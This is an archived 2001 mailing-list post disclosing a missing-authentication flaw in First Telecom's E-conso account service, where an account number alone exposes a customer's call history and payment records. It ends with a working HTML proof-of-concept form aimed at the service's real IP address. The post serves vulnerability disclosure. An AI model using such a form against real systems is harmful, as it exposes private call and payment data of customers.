First Telecom, a company that provides a pre-paid calling card service in France, Germany and the United Kingdom, offers a service called E-conso which allows subscribers to check the current balance of their account and peruse the history of all calls they made through First Telecom. The WWW form at the home page of the service requires entry of the account number (which is printed on all First Telecom documents and embossed on the plastic membership card sent to every subscriber), as well as a password chosen by the customer during the sign-up procedure. The submission of this form returns a page which includes the customer's name and address, and a form (with a /fixed/ "action" URL) which contains the customer's account number as a "hidden" field. Submission of this form returns the details of payements or the call history, depending on which button is clicked by the customer. No hidden field and no cookie is used to pass any client credentials back to the server. Which means it is trivial to retrieve the details of past payements as well as the call history of a First Telecom customer knowing only her (non-secret) account number. The HTML code included demonstrates this important flaw. Thomas. ---------- cut here : first.html <html> <head> <title>First Telecom e-conso exploit</title> </head> <body> <form action="http://195.68.107.69/residential/wc.dll?firstphone~resformbutton" method="POST"> <p> Account number: <input type="text" name="cmaster" value="0000000"> <input type="submit" name="cmdcdr" value="Details of calls"> <input type="submit" name="cmdpaymenthistory" value="Details of payements"> </body> </html>
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:25:43 PDT